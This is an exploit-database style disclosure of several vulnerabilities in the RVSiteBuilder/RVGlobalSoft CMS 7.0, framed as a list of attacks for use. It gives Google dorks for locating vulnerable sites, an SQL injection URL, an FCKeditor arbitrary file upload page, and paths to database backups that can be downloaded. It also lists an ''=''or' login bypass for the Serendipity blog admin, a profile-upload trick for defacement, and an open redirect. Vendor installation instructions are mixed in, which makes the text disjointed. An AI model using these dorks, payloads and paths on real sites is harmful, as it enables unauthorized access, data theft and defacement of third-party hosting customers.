#################################################################################################

# Exploit Title : RVSiteBuilder RVGlobalSoft CMS 7.0 Multiple Vulnerabilities

Vulnerabilities are => 
******************
SQL Injection / File Upload / Authentication Bypass / Database Disclosure

# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Team
# Date : 14/02/2019
# Vendor Homepages : rvsitebuilder.com ~  rvglobalsoft.com ~ ckeditor.com
+ dynarch.com/jscal/ ~ jquery.com ~ docs.s9y.org ~ seagullproject.org ~ seagullsystems.com
# Social Media Link : facebook.com/Rvglobalsoft/ ~ facebook.com/RVsitebuilder-331466346876534/
+ twitter.com/rvsitebuilder ~ twitter.com/rvglobalsoft_
# Version : 7.0 and all previous versions.
# Google Dork : inurl:''/rvsindex.php/''
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Types : CWE-209  [ Information Exposure Through an Error Message ]
+ CWE-89  [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-264 [ Permissions, Privileges, and Access Controls ]
+ CWE-200 [ Information Exposure ]
+ CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
+ CWE-592 [ Authentication Bypass Issues ]
+ CWE-23  [ Relative Path Traversal ]
+ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
+ CWE-36 [ Absolute Path Traversal ]
+ CWE-538  [ File and Directory Information Exposure ]
+ CWE-548  [ Information Exposure Through Directory Listing ]
# CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018060101

#################################################################################################

# RVSiteBuilder RVGlobalSoft CMS High-Performance 7.0 Hosting Provider Serious Multiple Vulnerabilities
*********************************************************************************************

# Vulnerabilities and Exploits includes =>
************************************ 

1) Full Path Disclosure Vulnerability
2) SQL Injection Vulnerability
3) Arbitrary File Upload Vulnerability 
4) Arbitrary File Download Database Backup .sql Vulnerability
5) What You See Is What You Get [ WYSIWYG ] FCKeditor Exploiter File Upload
6) Blog Administration Control Panel Authentication Bypass Vulnerability
7) Directory Traversal Vulnerability and Information Exposure Through Directory Listing
8) Information Exposure Through an Error Message
9) Permissions, Privileges, and Access Controls

#################################################################################################

#  Description :  RVglobalsoft is the leading software solutions for hosting provider.
***********************************************************************

# Google Dork 1 : inurl:''/rvsindex.php/''

# Google Dork 2 : inurl:''/rvsindex.php?/user/login''

# Google Dork 3 : inurl:''/rvsindex.php/user/register''

# Google Dork 4 : Index of /js      Parent Directory     SGL.js     SGL/     SglFckconfig.js     TreeMenu.js     datetimepicker.js

#################################################################################################

# RevSiteBuilder Full Path Disclosure Vulnerability and PHP Warnings and Errors [ SQL Injection ] => 
*****************************************************************************************

TARGET/blog/rvsindex.php?/sitebuilder/action/list/list.php=[SQL Injection]

FOR CPANEL => 

pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi

FOR DURECTADMUN => 

pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi

#Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to 
open stream: No such file or directory in /home/DOMAINADDRESS
/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264

Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with
SGL_OutputRendererStrategy::initEngine() in /opt/cpanel/ea-php56/root/usr
/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with 
SGL_OutputRendererStrategy::render($view) in /opt/cpanel/ea-php56/root/usr
/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

Strict Standards: Non-static method SGL_FrontController::isGoToClearCached() 
should not be called statically in /opt/cpanel/ea-php56/root/usr/share/pear
/RVSeagullMod/lib/SGL/FrontController.php on line 257

Strict Standards: Declaration of SGL_MDB2::query() should be compatible with 
MDB2_Driver_Common::query($query, $types = NULL, $result_class = 
true, $result_wrap_class = true) in /home/koleksim/.rvsitebuilder/websitepublish
/3686a6380b5f3a8986f5ef385ce208f5/var/cachedLibs.php on line 82

Deprecated: Non-static method SGL_Task_SetupPaths::hostnameToFilename() 
should not be called statically, assuming $this from incompatible context in 
/opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/Config.php on line 60

Warning: Include path '/usr/lib/php' not exists in /home/DOMAINADDRESS
/public_html/rvscommonfunc.php on line 174
Please contact your host provider ssh as root to server and run.

Fatal error: Class 'SGL_FrontController' not found in /home/DOMAINADDRESS/public_html/rvsindex.php on line 20

####################################################################################################

PATH => TARGET/ComponentAndUserFramework.php 

Please edit /home2/DOMAINADDRESS/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54
/usr/share/pear:/usr/local/lib/php"

# PATH for View Homepage => TARGET/rvsindex.php

####################################################################################################

# RevSiteBuilder Admin Login Control Panel Authentication Bypass =>  
**************************************************************

TARGET/admin  or this is the Admin Panel way =>

 /rvsindex.php?/user/login/

# PATH Admin Panel Login WordPress => 

TARGET/wp-login.php?redirect_to=http%3A%2F%2FDOMAINADDRESS%2F%2Fwp-admin%2F&reauth=1

# PATH Admin Panel Login Joomla => 

TARGET/administrator

# PATH Admin Panel Login osCommerce => 

TARGET/admin

# PATH Admin Panel Login OpenCart => 

TARGET/admin

Note : Some RVSiteBuilder websites uses wordpress and joomla 
but all files belongs to revsitebuilder and rvglobalsoft software.  
It is totally weird vulnerability. 

They have path like  TARGET/blogweb or  TARGET/osc  

But some sites gives this error. Sometimes it asks for username and password.

Please contact your provider edit file php.ini
change include_path to
include_path = ".:/usr/lib/php:/usr/local/lib/php"
save file and restart apache

####################################################################################################

# PATH for Uploaded Documents => 

TARGET/documents/

####################################################################################################

# PATH for JS JQuery-Ui Demos and Documents [ View Original Sources ] =>  T

TARGET/js/jquery-ui/demos/  and  TARGET/js/jquery-ui/docs/

# You can view => Interactions - Widgets ~ Effects ~ About jQuery UI ~ Theming - View Sources

####################################################################################################

# PATH for JQuery Tests Version  => TARGET/js/jquery-ui/tests/  

####################################################################################################

# PATH for Themes Codes => TARGET/js/jquery-ui/themes/base/  and TARGET/js/themes/

####################################################################################################

# PATH  jscalendar-1.0 "It is happening again" => TARGET/js/jscalendar/  => The Coolest DHTML Calendar - Online Demo

####################################################################################################

# PATH Changelog Last Changes =>  TARGET/js/scriptaculous/CHANGELOG

####################################################################################################

# PATH Learn Version => TARGET/js/scriptaculous/VERSION

####################################################################################################

# PATH for Optimizer => TARGET/optimizer.php

Please edit /home2/DOMAIN/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"

####################################################################################################

# Other Paths that gives same error => 

#TARGET/rvsMasterCompoDB.php
#TARGET/rvsStaticWeb.php
#TARGET/rvscommonfunc.php
#TARGET/rvssetup.php

Please edit /home2/DOMAIN/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"

####################################################################################################

#QuickForm tutorial example - *Enter your name:

#/scripts/rvslib/Pear/quickFormTest.php
#/themes/default/default/testForms.html

####################################################################################################

#{if:adminApprove} {adminApprove}
#/themes/rvtheme/authweb/authPage.html

####################################################################################################

#{foreach:aFaqData,key,aValue} {if:aValue.category_name} 
#/themes/rvtheme/faqweb/viewFaqWeb.html

###################################################################################################

#{if:forumsInstall} - Search for forums
#TARGET/themes/rvtheme/forums/blocksearch.html

####################################################################################################

# Testing forms
# /themes/default/testForms.php

#################################################################################################

# RevSiteBuilder RVGlobalSoft Open Redirection Vulnerability

# TARGET/login =>  It automatically redirects to this URL Link here =>  /rvsindex.php?/user/login/action/login 

# Open Redirection Page   /rvsindex.php?/user/login/redir/ANY-DOMAIN-ADRESS

#################################################################################################

# {translate(pageTitle)} Contactus
# /themes/rvtheme/main/contactMail.html

#################################################################################################

#{translate(#Please enter your name and e-mail address and select the newsletters that you want to subscribe.#)}
#/themes/rvtheme/newsletter/authorize.html
#/themes/rvtheme/newsletter/list.html
#/themes/rvtheme/newsletter/uikit_list.html

#################################################################################################

#RVTheme Admin Area and Users useable Login Paths => 

#/themes/rvtheme/user/account.html
#/themes/rvtheme/user/accountSummary.html
#/themes/rvtheme/user/blockLogin.html
#/themes/rvtheme/user/blockLogout.html
#/themes/rvtheme/user/horizontalBlockLogin.html
#/themes/rvtheme/user/loginForgot.html
#/themes/rvtheme/user/prefUserEdit.html
#/themes/rvtheme/user/profile.html
#/themes/rvtheme/user/uikit_login.html
#/themes/rvtheme/user/uikit_loginForgot.html
#/themes/rvtheme/user/uikit_prefUserEdit.html
#/themes/rvtheme/user/uikit_userAddUseCompoDB.html
#/themes/rvtheme/user/uikit_userPasswordEdit.html
#/themes/rvtheme/user/userAdd.html
#/themes/rvtheme/user/userAddUseCompoDB.html
#/themes/rvtheme/user/userPasswordEdit.html
#/themes/rvtheme/user/verticalBlockLogin.html
#/themes/rvtheme_admin/articleweb/admin_articleEdit.html
#/themes/rvtheme_admin/articleweb/admin_articleManager.html
#/themes/rvtheme_admin/articleweb/admin_articleTypeEdit.html
#/themes/rvtheme_admin/articleweb/admin_articleTypeManager.html
#/themes/rvtheme_admin/faqweb/admin_faqCategoryEdit.html
#/themes/rvtheme_admin/faqweb/admin_faqWebEdit.html
#/themes/rvtheme_admin/faqweb/admin_faqWebManager.html
#/themes/rvtheme_admin/css/

#####################################################################################################

#Learn Version of the RVSiteBuilder and RVGlobalSoft => TARGET/version.txt

#####################################################################################################

#Flash Player Version Detection =>   TARGET/Scripts/AC_RunActiveContent.js

#####################################################################################################

Getting started with Seagull Project =>  [ Seagull PHP Framework - (c) Seagull Systems 2003-2007 ]

/rvsindex.php?/default/masterLayout/layout-navtop-3col.css/

#####################################################################################################

# RevSiteBuilder SQL Injection Vulnerability => 
*****************************************

#Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be 
compatible with SGL_OutputRendererStrategy::initEngine() in /usr/local
/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

#Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible 
with SGL_OutputRendererStrategy::render($view) in /usr/local/lib/php
/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

#Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to 
open stream: No such file or directory in /home/DOMAINADDRESS
/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264

#################################################################################################

# What You See Is What You Get [ WYSIWYG ] Exploiter => 
*******************************************************

# WYSIWYG FCKeditor Arbitrary File Upload Vulnerability and Exploit

# Exploit => ..../wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html

# Example Site =>  /images/....

# Allowed File Extensions => .txt .png .gif .jpg .xml

# Sometimes Wysiwyg Editor Gives this error when trying upload a file to the server

Please contact your host provider ssh as root to server and run. 

For cpanel 
pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz 
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi 

For directadmin 
pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz 
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi 

Tutorial '' How to download RVsiteBuilder package file manually ? ''

For cPanel
--------------------

SSH to your cPanel server as root and run command

cd /usr/local/cpanel/whostmgr/docroot/cgi/

rm -rf /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/

rm -f rvsitebuilderinstaller.tar

wget http://download.rvglobalsoft.com/rvsitebuilderinstaller.tar

tar -xvf rvsitebuilderinstaller.tar

rm -f rvsitebuilderinstaller.tar

mkdir /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages

cd /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages

wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar

tar -xvf scriptdownloadpackage.tar

/usr/local/cpanel/3rdparty/bin/php scriptdownloadpackage.php

Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/

--------------------

For DirectAdmin

--------------------

SSH to your cPanel server as root and run command

cd /usr/local/rvglobalsoft/rvsitebuilderinstaller/packages

wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar

tar -xvf scriptdownloadpackage.tar

php scriptdownloadpackage.php

Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/

Reference => rvglobalsoft.com/knowledgebase/article/148/how-to-download-rvsitebuilder-package-file-manually/

Reference => rvskin.com/rvlogin/rvloginssh

##################################################################################################

# RevSiteBuilder Arbitrary File Database DB Backup .sql Download Vulnerability

# TARGET/rvsDbBackup.sql   => OR download and view SQL Database Backup Files  =>  TARGET/rvsUtf8Backup/rvsDbBackup.sql 

# View RevSiteBuilder Page Data Backup => TARGET/rvsUtf8Backup/rvsPageData.sql

# Example Site DB Backup View => archive.is/Demkr

###################################################################################################

1) Register yourself  to the site

TARGET/rvsindex.php?/user/register/

It says => You have successfully been registered. Please check your email for confirmation of your password.

Note : Confirm your registration in order to proceed.  
Sometimes RVSiteBuilder and RVGlobalsoft gives you a new password or you choose your password while registration. 
Pay attention : When you register choose your nickname carefully because it is important.  

It says => Activation is successfully. Please login.

2) Login to the User Interface => 

TARGET/rvsindex.php?/user/login/action/login

3) You can use Account - User Preference - User Password Change Area

/rvsindex.php?/user/account/action/viewProfile/
/rvsindex.php?/user/account/
/rvsindex.php?/user/userpreference/
/rvsindex.php?/user/userpassword/action/edit/

4) Go to your Profile like this => 

TARGET/rvsindex.php?/user/account/action/viewProfile/

Edit these Values

Choose Image Upload => Allowed File Extensions ( jpg,gif,bmp,png,txt,html)

It says => Your profile details have been successfully updated

PATH :  /themes/rvtheme/images/YOURNUCKNAME.

Note : Your chosen nickname is important while registration. Upload your html or txt file but do not put like this .yournickname.html 

Just . [ dot ] is important here.  You will see your index on that site.

#################################################################################################

# Serendipity RevSiteBuilder Blog Administration

#  /blogweb/serendipity_admin.php

# Username : '=''or'
# Password : '=''or'

#  You can use for both of them as '' admin ''  '' admin ''

#  /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect

#  /blogweb/serendipity_admin_image_selector.php?serendipity[htmltarget]=img_icon&serendipity[filename_only]=true

#  /blogweb/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect

#  /blogweb/serendipity_admin.php?serendipity[adminModule]=personal

#  /blogweb/uploads/yourfilename.rar

# Solution for Serendipity Blog Administration

# To mitigate this issue please upgrade at least to version 2.0.2:

# Download Link : https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip

# Please note that a newer version might already be available.

#################################################################################################

How to Install RVsitebuilder for Hosting Provider [ Bugs Fixation ] Check every folder and limit with .htaccess

cPanel
ssh to your server as root and install plugin 'RVglobalsoft manager' by run following shell command:
cd /usr/src; rm -fv rvsitebuilderinstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderinstall.sh; chmod +x rvsitebuilderinstall.sh; ./rvsitebuilderinstall.sh
Login to WHM as root. Go to WHM > Plugins > and run RVglobalsoft manager then follow simple install process.
Configure plugin for your panel. It's all done! RVsitebuilder is ready to use for all your users.

DirectAdmin
ssh to your server as "root" and install plugin 'RVglobalsoft manager' by run following shell command:
cd /usr/src; rm -fv rvsitebuilderdainstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderdainstall.sh; chmod +x rvsitebuilderdainstall.sh; ./rvsitebuilderdainstall.sh
For DirectAdmin panel with PHP version 5.5 only (If your panel is lower version of PHP, skip to step 3)
2.1 Run the following command to make RVsitebuilder compatible with PHP 5.5:
perl /usr/local/directadmin/plugins/rvsitebuilderinstaller/admin/installphpda.pl
2.2 Run the following command to make RVseagullmod compatible with PHP 5.5:
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi --force=rvseagullmod
Open file 'directadmin.conf' that located in: usr/local/directadmin/conf/directadmin.conf and change the value of 'numservers' from 5 to 15
Go to Directadmin > Admin level > and run 'RVsitebuilder Admin' then follow simple install process.
Login to DirectAdmin as "admin" and Configure plugin on your panel.
RVsitebuilder in DirectAdmin plugins cannot configure hosting plans but 
you can set plans in user level by RVsitebuilder Admin 
Go to Directadmin > Admin level > open RVsitebuilder Admin and configure in 'User Control List' or 'Reseller Control List.'

#################################################################################################

RVSiteBuilder Last Changes and Bugs Fixation Reports [ Changelog ] => rvsitebuilder.com/changelog/

RVSiteBuilder Installation => rvsitebuilder.com/installation/ 

RVSiteBuilder and RVGlobalSoft Tutorials => 

rvsitebuilder.com/tutorials/  ~ rvglobalsoft.com/installation/ ~ documentation.cpanel.net/display/68Docs/Installation+Guide

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm Digital Security Team

#################################################################################################